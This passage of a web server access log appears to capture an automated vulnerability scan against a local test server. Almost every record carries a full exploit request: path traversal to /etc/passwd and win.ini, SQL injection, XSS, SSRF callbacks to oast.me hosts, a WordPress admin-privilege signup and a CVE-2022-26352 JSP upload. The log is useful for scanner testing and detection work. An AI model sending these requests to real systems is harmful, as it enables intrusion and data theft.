"http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"op=login&username=admin|pwd&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /karma.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ImageUrl=http://ca27l3osmpvb3nig07h0cyh9btoxnyzz3.oast.me&ProviderName=TheMovieDB HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/external/7.0/system.System.get_infos HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29K6BjEdO3Y172eiqWr6Ik4WspL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"::1"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /autodiscover/autodiscover.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://ca27l3osmpvb3nig07h0z4oq5pccyt99z.oast.me/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/lifterlms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"\x0D\x0A\x0D\x0Apingback.ping\x0D\x0A\x0D\x0A\x0D\x0Ahttp://ca27l3osmpvb3nig07h0htdzf49e1pjju.oast.me\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc/pingback HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_username\x22\x0D\x0A\x0D\x0A29K6BeMuOB9Ub1dSQnSkMyBB115\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_email\x22\x0D\x0A\x0D\x0A29K6BeMuOB9Ub1dSQnSkMyBB115@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password\x22\x0D\x0A\x0D\x0A29K6BeMuOB9Ub1dSQnSkMyBB115@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password_present\x22\x0D\x0A\x0D\x0Atrue\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_first_name\x22\x0D\x0A\x0D\x0A29K6BeMuOB9Ub1dSQnSkMyBB115@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_last_name\x22\x0D\x0A\x0D\x0A29K6BeMuOB9Ub1dSQnSkMyBB115@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22_wp_http_referer\x22\x0D\x0A\x0D\x0A/wp/?page_id=18\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22pp_current_url\x22\x0D\x0A\x0D\x0Ahttp://127.0.0.1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22wp_capabilities[administrator]\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_form_id\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_referrer_page\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0App_ajax_signup\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22melange_id\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sensorlist.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/Authentication.asmx?op=Mode HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?return_url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/user.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/mc4wp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proftpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/..;/getFavicon?host=ca27l3osmpvb3nig07h09xdpxmqjrpfme.oast.me HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vault/auth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NON_EXISTING_PATH/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"9.332","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sfiler/Login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"aps=ca27l3osmpvb3nig07h06f6yzmwaqkfw1.oast.me&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /AdminTools/querybuilder/logon?framework= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"log=29K6BeMuOB9Ub1dSQnSkMyBB115@example.com&pwd=29K6BeMuOB9Ub1dSQnSkMyBB115@example.com&wp-submit=Log+In","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CACHE/sdesktop/install/start.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"--------------------------aadc326f7ae3eac3\x0D\x0AContent-Disposition: form-data; name=\x22name\x22; filename=\x22../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/29K6BZb1PWcRstudnlv2PLRmMVZ.jsp\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A<%\x0D\x0Aout.println(\x22CVE-2022-26352\x22);\x0D\x0A%>\x0D\x0A--------------------------aadc326f7ae3eac3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/content/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query={__typename} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET / HTTP/1.0","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 